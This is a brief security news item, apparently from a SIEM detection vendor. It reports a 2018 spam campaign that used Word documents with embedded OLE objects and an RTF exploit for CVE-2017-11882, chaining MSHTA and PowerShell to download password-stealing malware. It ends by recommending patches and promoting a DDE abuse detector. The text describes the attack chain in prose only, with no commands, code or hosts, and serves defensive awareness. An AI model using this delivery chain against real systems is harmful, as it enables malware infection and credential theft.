Delaware, USA – February 16, 2018 – Attackers have adopted a new macro-less technique that allows them to deliver malware to the victim’s systems without causing suspicion and bypassing email gateways. Researchers at Trustwave discovered a spam campaign in which attackers used emails with attached Microsoft Word documents to initiate a four-stage process of delivering malware. The document is created in MS Word 2007 and contains an embedded OLE object that downloads and executes RTF file. This file exploits the vulnerability CVE-2017-11882, which was fixed only in January 2018. RTF file executes MSHTA command to run HTA file from attacker’s server, which in turn contains the PowerShell script that downloads and runs malware. The detected campaign spreads password-stealing malware, but it’s only a matter of time before other attackers take over this technique to deliver advanced malware.
Installation of security updates will protect the systems in your organization from this infection technique. Another macro-less delivery technique is the abusing of DDE in MS Office. Despite the complexity of implementation, attackers continue to use this technique in spear phishing campaigns. DDE Exploitation Detector SIEM use case for ArcSight, QRadar and Splunk allows detecting abuse of DDE in any MS Office application to deliver malware or to run PowerShell scripts.